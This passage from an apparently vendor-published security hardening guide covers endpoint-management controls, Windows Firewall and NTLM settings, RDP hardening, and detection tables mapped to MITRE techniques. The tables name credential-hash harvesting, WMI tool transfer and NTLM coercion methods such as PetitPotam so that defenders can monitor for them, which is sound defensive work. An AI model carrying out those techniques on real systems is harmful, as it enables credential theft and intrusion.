<p role="presentation"><span>Enforce session lifetimes, idle session timeouts and utilize device-bound session protection to protect against token replay attacks.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Require access policies and </span><a href="https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/multi-admin-approval" rel="noopener" target="_blank"><span>multi-admin approval</span></a><span> for authorization of specific actions. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Reduce long-standing administrative permissions and migrate to a Just-in-Time (JIT) or Just-Enough-Access (JEA) access model for privileged roles and actions.  </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>For Microsoft Intune, leverage a combination of </span><a href="https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/scope-tags" rel="noopener" target="_blank"><span>role-based access control (RBAC) and scope tags</span></a><span> to reduce the blast radius and minimize the risk of compromised privileged identities being leveraged to impact a large scope of managed devices / endpoints. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Audit admin roles for anything including “Remote tasks/wipe/erase” permissions - and ensure these events are forwarded to a centralized SIEM. Additionally, reduce the scope of administrators that can perform these actions to the minimum required for business operations.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Reduce scope of API token permissions following the principle of least privilege. Remove or expire tokens after a period of inactivity. Rotate tokens on a regular basis.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>For cloud-hosted MDM platforms, utilize access policies to enforce network- and location-based allow listing. For local/on-premises MDM servers, utilize firewalls to restrict access to MDM infrastructure (management plane).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>If supported, configure wipe protection to prevent against mass device wiping within a specific threshold.  An example of this configuration within the Omnissa Workspace ONE platform is available </span><a href="https://docs.omnissa.com/bundle/WorkspaceONE-UEM-Managing-DevicesV2406/page/WipeProtection.html" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Review existing scripts and configuration profiles deployed via the MDM platform to identify and remediate any hardcoded plain text passwords, API keys, or other sensitive secrets.</span></p>
</li>
</ul>
<h4><span>Detection Opportunities for Securing Endpoint and Mobile Device Management Platforms</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Remote Wipe or Factory Reset Command Issued</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1485/" rel="noopener" target="_blank"><span>T1485 - Data Destruction</span></a></p>
</td>
<td>
<p><span>Monitor endpoint management platform audit logs for issuance of remote wipe, factory reset, or retire commands. </span></p>
<p><span>Alert on any wipe command targeting more than a threshold number of devices within a defined time window, or wipe commands issued outside approved change windows.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Anomalous MDM/EDR Administrator Authentication</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/004/" rel="noopener" target="_blank"><span>T1078.004 - Valid accounts: Cloud accounts</span></a></p>
</td>
<td>
<p><span>Monitor authentication logs for endpoint management platform admin consoles for sign-ins from unrecognized IPs, non-compliant devices, or locations inconsistent with the administrator’s historical access pattern. </span></p>
<p><span>Alert on admin authentication that bypasses Conditional Access or lacks phishing-resistant MFA.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Bulk Script or Configuration Profile Deployment</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1072/" rel="noopener" target="_blank"><span>T1072 - Software Deployment Tools</span></a></p>
</td>
<td>
<p><span>Monitor of mass deployment of new scripts, configuration profiles, or software packages pushed to device groups via the management platform.</span></p>
<p><span> Alert when a deployment targets all devices or broad scope tags rather than specific groups, particularly when initiated by an account that has not previously performed bulk deployments.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Administrative Role or Permission Modification</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span>T1098 - Account Manipulation</span></a></p>
</td>
<td>
<p><span>Monitor platform audit logs for changes to administrative roles, RBAC assignments, or scope tag modifications.</span></p>
<p><span> Alert on elevation of accounts to roles with remote task, wipe, or retire permissions, and on removal of multi-admin approval requirements.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>API Key creation or Anomalous API access</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1098/001/" rel="noopener" target="_blank"><span>T1098.001 - Additional Cloud Credentials</span></a></p>
</td>
<td>
<p><span>Monitor for creation of new API keys, tokens, or service principal credentials for the endpoint management platform. </span></p>
<p><span>Alert on API calls from previously unseen source IPs or user-agents, and on API activity outside business hours. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>Management Platform Audit Log Tampering or Disablement</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1562/008/" rel="noopener" target="_blank"><span>T1562.008 - Impair Defenses: Disable or Modify Cloud Logs</span></a></p>
</td>
<td>
<p><span>Monitor for modifications to the platform’s audit logging configuration, including disablement of change management logging, redirection of syslog export destinations, or deletion of audit log entries. </span></p>
<p><span>Alert on changes to log retention settings or export configurations.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>3. On-Premises Lateral Movement Protections</span></h3>
<h4><span>Endpoint Hardening</span></h4>
<h5><span>Windows Firewall Configurations</span></h5>
<p><span>Once initial access to on-premises infrastructure is established, threat actors will conduct lateral movement to attempt to further expand the scope of access and persistence. To protect Windows endpoints from being accessed using common lateral movement techniques, a Windows Firewall policy can be configured to restrict the scope of communications permitted between endpoints within an environment. A Windows Firewall policy can be enforced locally or centrally as part of a Group Policy Object (GPO) configuration. At a minimum, the common ports and protocols leveraged for lateral movement that should be blocked between workstation-to-workstation and workstations to non-domain controllers and non-file servers include:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>SMB (TCP/445, TCP/135, TCP/139)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Remote Desktop Protocol (TCP/3389)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Windows Remote Management (WinRM)/Remote PowerShell (TCP/80, TCP/5985, TCP/5986)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Windows Management Instrumentation (WMI) (dynamic port range assigned through Distributed Component Object Model (DCOM))</span></p>
</li>
</ul>
<p><span>Using a GPO (Figure 5), the settings listed in Table 11 can be configured for the Windows Firewall to control </span><strong>inbound</strong><span> communications to endpoints in a managed environment. The referenced settings will effectively block all inbound connections for the </span><span>Private</span><span> and </span><span>Public</span><span> profiles, and for the </span><span>Domain</span><span> profile, only allow connections that do not match a predefined block rule. </span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><span>Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Windows Firewall with Advanced Security</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Figure 5: GPO path for creating Windows Firewall rules</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Profile Setting</strong></p>
</td>
<td>
<p><strong>Firewall State</strong></p>
</td>
<td>
<p><strong>Inbound Connections</strong></p>
</td>
<td>
<p><strong>Log Dropped Packets</strong></p>
</td>
<td>
<p><strong>Log Successful Connections</strong></p>
</td>
<td>
<p><strong>Log File Path</strong></p>
</td>
<td>
<p><strong>Log File Maximum Size (KB)</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>On</span></p>
</td>
<td>
<p><span>Allow</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><code>%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p>
</td>
<td>
<p><span>4,096</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Private</span></p>
</td>
<td>
<p><span>On</span></p>
</td>
<td>
<p><span>Block All Connections</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><code>%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p>
</td>
<td>
<p><span>4,096</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Public</span></p>
</td>
<td>
<p><span>On</span></p>
</td>
<td>
<p><span>Block All Connections</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><span>Yes</span></p>
</td>
<td>
<p><code>%systemroot%\system32\LogFiles\Firewall\pfirewall.log</code></p>
</td>
<td>
<p><span>4,096</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 11: Windows Firewall recommended configuration state</span></div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig6.max-1000x1000.png" alt="Windows Firewall Recommendation Configurations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 6: Windows Firewall recommendation configurations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Additionally, to ensure that only centrally managed firewall rules are enforced (and cannot be overridden by a threat actor), the settings for </span><span>Apply local firewall rules</span><span> and </span><span>Apply local connection security rules</span><span> can be set to </span><span>No</span><span> for all profiles.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig7.max-1000x1000.png" alt="Windows Firewall Domain Profile Customized Settings">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 7: Windows Firewall domain profile customized settings</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>To quickly contain and isolate systems, the centralized Windows Firewall setting of </span><span>Block all connections</span><span> (Figure 8) will prevent any inbound connections from being established to a system. This is a setting that can be enforced on workstations and laptops, but will likely impact operations if enforced for servers, although if there is evidence of an active threat actor lateral pivoting within an environment, it may be a necessary step for rapid containment.</span></p>
<p><strong>Note:</strong><span> </span><span>If this control is being used temporarily to facilitate containment as part of an active incident, once the incident has been contained and it has been deemed safe to re-establish connectivity among systems within an environment, the </span><span>Inbound Connections</span><span> setting can be changed back to </span><span>Allow</span><span> using a GPO.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig8.max-1000x1000.png" alt="Windows Firewall - Block All Connections Settings">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="2sb2o">Figure 8: Windows Firewall - Block All Connections settings</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>If blocking all inbound connectivity for endpoints during a containment event is not practical, or for the </span><span>Domain</span><span> profile configurations, at a minimum, the protocols listed in Table 12 should be enforced using either a GPO or via the commands referenced within the table.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><span>For any specific applications that may require inbound connectivity to end-user endpoints, the local firewall policy should be configured with specific IP address exceptions for origination systems that are authorized to initiate inbound connections to such devices.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Protocol/Port</strong></p>
</td>
<td>
<p><strong>Windows Firewall Rule</strong></p>
</td>
<td>
<p><strong>Command Line Enforcement</strong></p>
</td>
</tr>
<tr>
<td>
<p role="presentation"><span>SMB</span></p>
<p><span>TCP/445, TCP/139, TCP/135</span></p>
</td>
<td>
<p role="presentation"><span>Predefined Rule Name:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>File and Print Sharing</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Remote Desktop</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Windows Management Instrumentation (WMI)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Windows Remote Management</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Windows Remote Management (Compatibility)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>TCP/5986</span></p>
</li>
</ul>
</td>
<td>
<p><code>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=no</code></p>
</td>
</tr>
<tr>
<td>
<p role="presentation"><span>Remote Desktop Protocol</span></p>
<p><span>TCP/3389</span></p>
</td>
<td>
<p role="presentation"><span>Predefined Rule Name:</span></p>
</td>
<td>
<p><code>netsh advfirewall firewall set rule group="Remote Desktop" new enable=no</code></p>
</td>
</tr>
<tr>
<td>
<p><span>WMI</span></p>
</td>
<td>
<p role="presentation"><span>Predefined Rule Name:</span></p>
</td>
<td>
<p><code>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=no</code></p>
</td>
</tr>
<tr>
<td>
<p role="presentation"><span>Windows Remote Management/PowerShell Remoting</span></p>
<p><span>TCP/80, TCP/5985, TCP/5986</span></p>
</td>
<td>
<p role="presentation"><span>Predefined Rule Name:</span></p>
</td>
<td>
<p role="presentation"><code>netsh advfirewall firewall set rule group="Windows Remote Management" new enable=no</code></p>
<p role="presentation"><span>Via PowerShell:</span></p>
<p><code>Disable-PSRemoting -Force</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 12: Windows Firewall suggested block rules</span></p>
</div>
</div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig9.max-1000x1000.png" alt="Windows Firewall Suggested Rule Blocks via Group Policy">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ibnn4">Figure 9: Windows Firewall suggested rule blocks via Group Policy</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h5><span>NTLM Authentication Configurations</span></h5>
<p><span>Threat actors often attempt to harvest credentials (including Windows NTLMv1 hashes) based upon outbound SMB or WebDAV communications. Organizations should review NTLM settings for Windows-based endpoints, and work to harden, disable, or restrict NTLMv1 authentication requests. </span></p>
<p><span>To fully restrict NTLM authentication to remote servers, the following GPO settings can be leveraged:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options &gt; Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Allow all</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Audit all</span></p>
</li>
<li aria-level="1"><span>Deny all</span></li>
</ul>
</li>
</ul>
<p><strong>Note:</strong><span> </span><span>If "</span><code>Deny all</code><span>" is selected, the client computer cannot authenticate (send credentials) to a remote server using NTLM authentication. Before setting to "</span><code>Deny all,</code><span>" organizations should configure the GPO setting with the "</span><code>Audit all</code><span>" enforcement. With this configuration, audit and block events will be recorded within the Operational event log on endpoints (</span><code>Applications and Services Log\Microsoft\Windows\NTLM</code><span>).</span></p>
<p><span>If any recorded NTLM authentication events are required, organizations can configure the "</span><code>Network security: Restrict NTLM: Add remote server exceptions for NTLM authentication</code><span>" setting to define a listing of remote servers, which are required to use NTLM authentication.</span></p>
<h4><span>Detection Opportunities for SMB, WMI, and NTLM Communications</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>High Volume of SMB Connections</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1021/002/" rel="noopener" target="_blank"><span>T1021.002 – SMB/Windows Admin Shares</span></a></p>
</td>
<td>
<p><span>Search for a sharp increase in SMB connections that fall outside of a normal pattern.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Outbound Connection Attempted Over SMB</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1212/" rel="noopener" target="_blank"><span>T1212 – Exploitation for Credential Access</span></a></p>
</td>
<td>
<p><span>Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>WMI Being Used to Call a Remote Service</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1047/" rel="noopener" target="_blank"><span>T1047 – Windows Management Instrumentation</span></a></p>
</td>
<td>
<p><span>Search for WMI being used via a command line or PowerShell to call a remote service for execution.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>WMI Being Used for Ingress Tool Transfer</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1105/" rel="noopener" target="_blank"><span>T1105 – Ingress Tool Transfer</span></a></p>
</td>
<td>
<p><span>Search for suspicious usage of WMI to download external resources. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>Forced NTLM Authentication Using SMB or WebDAV</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1187/" rel="noopener" target="_blank"><span>T1187 – Forced Authentication</span></a></p>
</td>
<td>
<p><span>Search for potential NTLM authentication attempts using SMB or WebDAV.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>NTLM Relay via Coercion</span></p>
</td>
<td>
<p><span>T1187 - Forced Authentication</span></p>
</td>
<td>
<p><span>Monitor for NTLM authentication attempts from Domain Controllers or privileged servers to unexpected destinations, particularly to HTTP endpoints (AD CS web enrollment). </span></p>
<p><span>Detect PetitPotam by monitoring for EfsRpcOpenFileRaw calls, DFSCoerce via DFS-related named pipe access, and PrinterBug via SpoolService RPC calls.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 13: Detection opportunities for SMB, WMI, and NTLM communications</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Remote Desktop Protocol Hardening</span></h4>
<p><span>Remote Desktop Protocol (RDP) is a common method used by threat actors to remotely connect to systems, laterally move from the perimeter onto a larger scope of internal systems, and perform malicious activities (such as data theft or ransomware deployment). External-facing systems with RDP open to the internet present an elevated risk. Threat actors may exploit this vector to gain initial access to an organization and then perform lateral movement into the organization to complete their mission objectives.</span></p>
<p><span>Proactively, organizations should scan their public IP address ranges to identify systems with RDP (TCP/3389) and other protocols (SMB – TCP/445) open to the internet. At a minimum, RDP and SMB should not be directly exposed for ingress and egress access to/from the internet. If required for operational purposes, explicit controls should be implemented to restrict the source IP addresses, which can interface with systems using these protocols. The following hardening recommendations should also be implemented.</span></p>
<h5><span>Enforce Multi-Factor Authentication</span></h5>
<p><span>If external-facing RDP must be used for operational purposes, MFA should be enforced when connecting using this method. This can be accomplished either via the integration of a third-party MFA technology or by leveraging a Remote Desktop Gateway and Azure Multifactor Authentication Server using Remote Authentication Dial-In User Service (<a href="https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfaserver-nps-rdg" rel="noopener" target="_blank">RADIUS</a>)</span><span>.</span></p>
<h5><span>Leverage Network-Level Authentication</span></h5>
<p><span>For external-facing RDP servers, Network-Level Authentication (NLA) provides an extra layer of preauthentication before a connection is established. NLA can also be useful for protecting against brute-force attacks, which often target open internet-facing RDP servers.</span></p>
<p><span>NLA can be configured either via the user interface (UI) (Figure 10) or via Group Policy (Figure 11).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig10.max-1000x1000.png" alt="Enabling NLA via the UI">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bx1dm">Figure 10: Enabling NLA via the UI</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Using a GPO, the setting for NLA can be configured via:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Computer Configuration &gt; Policies &gt; Administrative Templates &gt; Windows Components &gt; Remote Desktop Services &gt; Remote Desktop Session Host &gt; Security &gt; Require user authentication for remote connections by using Network Level Authentication</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Enabled</span></p>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig11.max-1000x1000.png" alt="Enabling NLA via Group Policy">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bx1dm">Figure 11: Enabling NLA via Group Policy</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Some caveats about leveraging NLA for RDP:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The Remote Desktop client v7.0 (or greater) must be leveraged.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>NLA uses CredSSP to pass authentication requests on the initiating system. CredSSP stores credentials in Local Security Authority (LSA) memory on the initiating system, and these credentials may remain in memory even after a user logs off the system. This provides a potential exposure risk for credentials in memory on the source system.</span></p>
</li>
<li aria-level="1">
